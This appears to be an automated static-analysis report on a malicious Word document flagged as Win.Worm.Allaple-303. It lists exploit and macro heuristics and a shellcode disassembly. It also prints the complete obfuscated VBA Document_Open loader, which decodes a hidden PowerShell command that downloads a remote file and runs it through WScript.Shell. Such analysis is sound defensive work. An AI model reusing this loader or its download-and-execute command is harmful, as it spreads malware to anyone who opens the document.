MALICIOUS
710
Risk Score
Malware Insights
MITRE ATT&CK
T1204.002 Malicious File
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1027 Obfuscated Files or Information
T1203 Exploitation for Client Execution
The sample is a malicious Microsoft Word document exploiting CVE-2008-2244 to deliver a PE executable. The VBA macro contains an obfuscated loader that likely executes the embedded payload. ClamAV identified the sample as Win.Worm.Allaple-303, and an embedded executable was also detected by ClamAV.
Heuristics 18
-
CVE-2008-2244 — Microsoft Word record-parsing payload critical CVE likely CVE_2008_2244Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
-
ClamAV: Win.Worm.Allaple-303 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Worm.Allaple-303
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
End If erodesolve = GetObject(Join(licensewalk, "")).Run(ylkasflqeeerx, isdltfbtnozfmnvfavs) Dim elderinhale As Integer -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End If erodesolve = GetObject(Join(licensewalk, "")).Run(ylkasflqeeerx, isdltfbtnozfmnvfavs) Dim elderinhale As Integer -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Public Sub Document_Open() Dim hillunknown As Double -
x86 GetPC stub (CALL $+5; POP EBX) high SC_GETPC_CALLx86 GetPC stub (CALL $+5; POP EBX)
Disassembly
Attempted x86 opcode disassembly00087B0B e800000000 call 0x87b10 00087B10 5b pop ebx 00087B11 b969030000 mov ecx, 0x369 00087B16 03d9 add ebx, ecx 00087B18 50 push eax 00087B19 53 push ebx 00087B1A e8b2020000 call 0x87dd1 00087B1F 5e pop esi 00087B20 5d pop ebp 00087B21 8b36 mov esi, dword ptr [esi] 00087B23 8bfd mov edi, ebp 00087B25 03bd55fdffff add edi, dword ptr [ebp - 0x2ab] 00087B2B 8bdf mov ebx, edi 00087B2D 833f00 cmp dword ptr [edi], 0 00087B30 750a jne 0x87b3c 00087B32 83c704 add edi, 4 00087B35 b900000000 mov ecx, 0 00087B3A eb16 jmp 0x87b52 00087B3C b901000000 mov ecx, 1 00087B41 033b add edi, dword ptr [ebx] 00087B43 83c304 add ebx, 4 00087B46 833b00 cmp dword ptr [ebx], 0 00087B49 7436 je 0x87b81 00087B4B 0113 add dword ptr [ebx], edx 00087B4D 8b33 mov esi, dword ptr [ebx] 00087B4F 037b04 add edi, dword ptr [ebx + 4] 00087B52 57 push edi 00087B53 51 push ecx 00087B54 52 push edx 00087B55 53 push ebx 00087B56 ffb501feffff push dword ptr [ebp - 0x1ff] 00087B5C ffb5fdfdffff push dword ptr [ebp - 0x203] 00087B62 8bd6 mov edx, esi 00087B64 8bcf mov ecx, edi 00087B66 8b .byte 0x8b 00087B67 85 .byte 0x85 00087B68 8d .byte 0x8d 00087B69 fd std 00087B6A ff .byte 0xff
-
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 709,440 bytes but its declared streams total only 215,308 bytes — 494,132 bytes (70%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOADOLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECTReference to VirtualProtect API
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8238 bytes |
SHA-256: 13f6b02f3cfcceb48fa00ea1ccad2e286d7b27f0e9d0832431fd49a85df0024d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
Dim hillunknown As Double
Dim dragonmisery As Long
hillunknown = 259
dragonmisery = 333
'erosionpoem
If hillunknown <> dragonmisery Then
Dim ounogxmljoufe As Integer
ounogxmljoufe = 556
'bljbswgvkgoc
Dim shinevendor As String
shinevendor = "imposemachine"
'apartugly
End If
Dim mammalwait As Double
Dim erlqvgwbwkxporjpq As Long
mammalwait = 845
erlqvgwbwkxporjpq = 55
'trpcqkaavfzurvdfh
If mammalwait <> erlqvgwbwkxporjpq Then
Dim xvdyhscfqepi As Integer
xvdyhscfqepi = 785
'actressthey
Dim coverleft As String
coverleft = "blanketbuyer"
'eternalurge
End If
Selection.TypeText ("It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. The point of using Lorem Ipsum is that it has a more-or-less normal distribution of letters, as opposed to using 'Content here, content here', making it look like readable English." & vbCrLf)
Dim gravityprovide As Integer
gravityprovide = 526
'onrfswzagtxvzkvtin
Dim silksoup As String
silksoup = "uorwbkmpvsqdqow"
inhaletrend = blamestart()
Dim myvfcjaelozo As Integer
myvfcjaelozo = 450
'cramlegend
Dim sokomcszqjphw As String
sokomcszqjphw = "cupboardscrub"
Dim pilotwage As Integer
pilotwage = 909
'sausagesmile
Dim affairremove As String
affairremove = "acquirecave"
kvaovbcbvlszoxy = Len(inhaletrend)
Dim fatherhuman As Integer
fatherhuman = 303
'championpicture
Dim xnpsviohvmelhhbmws As String
xnpsviohvmelhhbmws = "vphhswedfkmevoyaiip"
zhiqfcaxsjpgfepeb = ""
For gorxdtehgz = 1 To kvaovbcbvlszoxy
Dim xcsixmnldwouqwa As Integer
xcsixmnldwouqwa = 691
'lqnncrkbnwdn
Dim illsmile As String
illsmile = "bodymodify"
Dim cakecattle As Integer
cakecattle = 525
'tbzqnnnsfh
Dim itstpnqxuepb As String
itstpnqxuepb = "bleaktwin"
If Not "QXuXA6B0vAv70V" Like "*" & Mid(inhaletrend, gorxdtehgz, 1) & "*" Then
Dim yvemxugmwakolz As Double
Dim enrichshuffle As Long
yvemxugmwakolz = 468
enrichshuffle = 905
'xxxkwhrlu
If yvemxugmwakolz <> enrichshuffle Then
Dim phzahqxnpwhzxvbizdo As Integer
phzahqxnpwhzxvbizdo = 315
'puehklsgy
Dim allowmarine As String
allowmarine = "zcininxfehiftkuxmlb"
'pieceready
End If
Dim aspectrenew As Integer
aspectrenew = 976
'svgtxcgrg
Dim providesound As String
providesound = "chiefwave"
zhiqfcaxsjpgfepeb = zhiqfcaxsjpgfepeb & Mid(inhaletrend, gorxdtehgz, 1)
Dim expandprotect As Double
Dim xmakganughubyjskx As Long
expandprotect = 631
xmakganughubyjskx = 700
'kitethen
If expandprotect <> xmakganughubyjskx Then
Dim hexqgqdpbv As Integer
hexqgqdpbv = 712
'wttwunthtydcmd
Dim nkoyvexlmthpsz As String
nkoyvexlmthpsz = "ayzciyhgdmxahrv"
'firstspy
End If
End If
Dim enhancepole As Double
Dim naturevanish As Long
enhancepole = 466
naturevanish = 818
'fwjyrzfkefmiuxoxl
If enhancepole <> naturevanish Then
Dim emotionjob As Integer
emotionjob = 151
'definegrab
Dim mxitmqhwy As String
mxitmqhwy = "jlpynpdihi"
'ftsfrlslm
End If
Next
Dim hamsterroute As Double
Dim awareorange As Long
hamsterroute = 833
awareorange = 814
'yjmvjzceaggektdrqbg
If hamsterroute <> awareorange Then
Dim boyscatter As Integer
boyscatter = 946
'cerealnever
Dim boilecho As String
boilecho = "qzdhbpmeojec"
'commongame
End If
gluetrick = Module1.erodesolve(zhiqfcaxsjpgfepeb, 0)
Dim okaysurprise As Integer
okaysurprise = 408
'ucuohgqotnyn
Dim idleoffer As String
idleoffer = "loungenest"
With ActiveDocument.InlineShapes
Do While .Count > 0
.Item(1).Delete
Dim nqqsvnaysvimhjjit As Double
Dim hmzblwpmq As Long
nqqsvnaysvimhjjit = 702
hmzblwpmq = 529
'etijehamkyvisazt
If nqqsvnaysvimhjjit <> hmzblwpmq Then
Dim clarifycrazy As Integer
clarifycrazy = 100
'afasepeexiyw
Dim palacepaper As String
palacepaper = "enoughpublic"
'giraffevibrant
End If
Loop
Dim coiltotal As Double
Dim termtree As Long
coiltotal = 116
termtree = 393
'mghooevfbjoveevcqe
If coiltotal <> termtree Then
Dim clawemotion As Integer
clawemotion = 615
'differendorse
Dim chefcook As String
chefcook = "rjgewhcutgwrkweqc"
'fmoarwlpkpqbs
End If
End With
Dim fosterpanda As Integer
fosterpanda = 970
'gdortiyfpryhuolqqbo
Dim wpgaezsxqp As String
wpgaezsxqp = "nfxbjbzyjilzdeaqgnp"
End Sub
Function blamestart()
Dim vcubkuelczq As Integer
vcubkuelczq = 715
'demisefine
Dim hpaakswftb As String
hpaakswftb = "qklzjnzoydpu"
Dim qfyeaywzu As Double
Dim archfaculty As Long
qfyeaywzu = 62
archfaculty = 799
'burdenleisure
If qfyeaywzu <> archfaculty Then
Dim ahfrrvcgpii As Integer
ahfrrvcgpii = 644
'federaltruth
Dim tnixoramno As String
tnixoramno = "featurereturn"
'greatgrocery
End If
zhiqfcaxsjpgfepeb = "6.0fBi0lAeXXbXXo66x7.Q7m7AoVuev/V6iVt7XcAtAkV6sBX.7eu0xXeQ'u0,0V'B%XATAE0MvuPQV%u0\0\"
Dim appearcanvas As Integer
appearcanvas = 706
'vuiotbvez
Dim asmxbwxmcctamtot As String
asmxbwxmcctamtot = "jlfdtcngazyxwlrhv"
wvsijuqagujeaoyd = "AAMvSB6oAfAAf60iVvcue7.veXxQuev'A6)X Au&0 v7%XTQ7EvMvPA%B"
inhaletrend = "B6c0mQdXV.VveXxQe0Q Q0/ucBu 7pXoAwVe6rusV6h60eXlQAlX6.v0e7vxBeA6 A-A0wQ QuhviQAd7d7eBXnv6 X7-XXnAovVpB0 Qv-6eupV0 vb0yQpB6aXvsQBsV V(7NAueuAw07-uuOubQvjQev6cXtQ6 0Suy0QsXXtVveXBmQX.vVNBeXtvB.QWQe0Ab77CXXl0iVeVAnVVtA)0.BuDBAo7w7Xn0lX7o00avd7FvBiQulAveV(A'vVh0tVt0pBsA:A/7/Xvd0"
cfcqqoyogs = "u7fXfAivXc0eV.vvevx7e"
Dim tobaccotrash As Double
Dim globepupil As Long
tobaccotrash = 345
globepupil = 979
'xmbyafvomehuc
If tobaccotrash <> globepupil Then
Dim faithgrid As Integer
faithgrid = 392
'lahescesqfl
Dim absentlobster As String
absentlobster = "lodedmogdc"
'officepipe
End If
Dim mwgppxzjz As Double
Dim angerfresh As Long
mwgppxzjz = 26
angerfresh = 461
'recallshiver
If mwgppxzjz <> angerfresh Then
Dim edrrdwvgzgqwq As Integer
edrrdwvgzgqwq = 70
'aexocumpmelktfdn
Dim destroyspoon As String
destroyspoon = "pulpthrow"
'eeuwpuijfrf
End If
blamestart = inhaletrend & zhiqfcaxsjpgfepeb & wvsijuqagujeaoyd & "\A\0MuSA0o" & cfcqqoyogs
Dim uokxoecaxssfbxyct As Integer
uokxoecaxssfbxyct = 180
'grabmercy
Dim zbqetbzkqdjwk As String
zbqetbzkqdjwk = "cleanfault"
End Function
Attribute VB_Name = "Module1"
Function erodesolve(ylkasflqeeerx, isdltfbtnozfmnvfavs)
Dim licensewalk(3)
Dim ziqxahmzfhc As Double
Dim taqkhvgbrbxg As Long
ziqxahmzfhc = 951
taqkhvgbrbxg = 158
'czqyrdlqjuwr
If ziqxahmzfhc <> taqkhvgbrbxg Then
Dim bunkerperfect As Integer
bunkerperfect = 976
'cangqlnvdbxo
Dim hnrhwbedug As String
hnrhwbedug = "dbmxnwhjy"
'affeshejwfkskbanj
End If
Dim ylycmxxypwlppd As Double
Dim rdjmgwuskohwillld As Long
ylycmxxypwlppd = 75
rdjmgwuskohwillld = 866
'sickslide
If ylycmxxypwlppd <> rdjmgwuskohwillld Then
Dim anydetect As Integer
anydetect = 144
'bdpvpraeof
Dim bnvnhcfmpvnmutukly As String
bnvnhcfmpvnmutukly = "zhtymljtrupkpep"
'dadgossip
End If
licensewalk(0) = "new:{72C24DD5-D70A-438"
licensewalk(1) = "B-8A42-98424B88A"
Dim reviewscrap As Integer
reviewscrap = 449
'qbqekalyqswgcnqjbfg
Dim metalshiver As String
metalshiver = "wmwrmyrjkmrscfugqe"
Dim dovespice As Double
Dim tpnmcvlzwzgqbtfz As Long
dovespice = 384
tpnmcvlzwzgqbtfz = 833
'hvdkaucdc
If dovespice <> tpnmcvlzwzgqbtfz Then
Dim clusterowner As Integer
clusterowner = 248
'eqyuljasoam
Dim hdzcvflzauqq As String
hdzcvflzauqq = "clockjuice"
'manupdate
End If
licensewalk(2) = "FB8}"
Dim wpfwtqhqyvz As Double
Dim vuskughgn As Long
wpfwtqhqyvz = 415
vuskughgn = 701
'sillyvictory
If wpfwtqhqyvz <> vuskughgn Then
Dim coppercrash As Integer
coppercrash = 973
'dptgdjoiujhepvt
Dim ycxqqxyxxdrcem As String
ycxqqxyxxdrcem = "closehurdle"
'pzdhbqally
End If
erodesolve = GetObject(Join(licensewalk, "")).Run(ylkasflqeeerx, isdltfbtnozfmnvfavs)
Dim elderinhale As Integer
elderinhale = 73
'lessonthrow
Dim steakvoid As String
steakvoid = "chestjaguar"
End Function
|
|||
embedded_office_00036000.exe |
embedded-pe | Office MZ+PE at offset 0x36000 | 488256 bytes |
SHA-256: a03cfd589a31d5cd9271d562428655d43422f9158d0c169b8c13a1de00fc9a4a |
|||
|
Detection
ClamAV:
Win.Worm.Allaple-303
Obfuscation or payload:
likely
Static shellcode analysis found candidate code region(s). Indicators: SC_STR_GETPROCADDRESS, SC_STR_LOADLIBRARY, SC_STR_SHELLEXEC Static shellcode analysis recovered API/import strings: GetProcAddress, VirtualAlloc, VirtualProtect, ExitProcess, advapi32.dll, shell32.dll
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.